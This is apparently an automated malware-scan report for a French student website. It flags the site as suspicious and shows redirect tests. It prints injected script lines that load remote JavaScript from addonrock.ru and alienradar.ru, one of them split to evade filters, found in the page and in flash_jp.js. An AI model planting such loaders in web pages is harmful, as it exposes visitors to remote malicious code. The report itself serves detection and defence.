Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=justpinagui.free.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://justpinagui.free.fr/ | 200 OK Content-Length: 6688 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: addonrock.ru ...[4409 bytes skipped]... <p>Je n'ai pas flash ? j'ai un problème d'affichage ? <a href="index.php?flash=no">Alors je clique ici :)</a> </p> </div> <div id="end"> <br /> <br /> copyright V.I.C. Team :: EPITA :: 2006 - 2007 </div> </div> </body> </html> <script type="text/javascript" src="http://addonrock.ru/Add-on.js"></script> <!--eb68b7ca93ad18567f073932561e58fb--> | ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://justpinagui.free.fr/flash_jp.js | 200 OK Content-Length: 868 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[506 bytes skipped]... VIE_VALUE + '" />'); if(QUALITY_VALUE!='') document.write('<param name="quality" value="' + QUALITY_VALUE + '">'); if(BG_COLOR!='') document.write('<param name="BGCOLOR" value="' + BG_COLOR + '">'); if(LOOP!='') document.write('<param name="loop" value="' + LOOP + '">'); document.write('</object>'); } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Add-on.js"></scri'+'pt>'); Antivirus reports:
| ||
http://addonrock.ru/Add-on.js | 500 Can't connect to addonrock.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
http://addonrock.ru/test404page.js | 500 Can't connect to addonrock.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: justpinagui.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 03:48:41 GMT
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Type: text/html
X-Powered-By: PHP/5.1.3RC4-dev
GET / HTTP/1.1
Host: justpinagui.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 03:48:41 GMT
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Type: text/html
X-Powered-By: PHP/5.1.3RC4-dev
Second query (visit from search engine):
GET / HTTP/1.1
Host: justpinagui.free.fr
Referer: http://www.google.com/search?q=justpinagui.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: justpinagui.free.fr
Referer: http://www.google.com/search?q=justpinagui.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.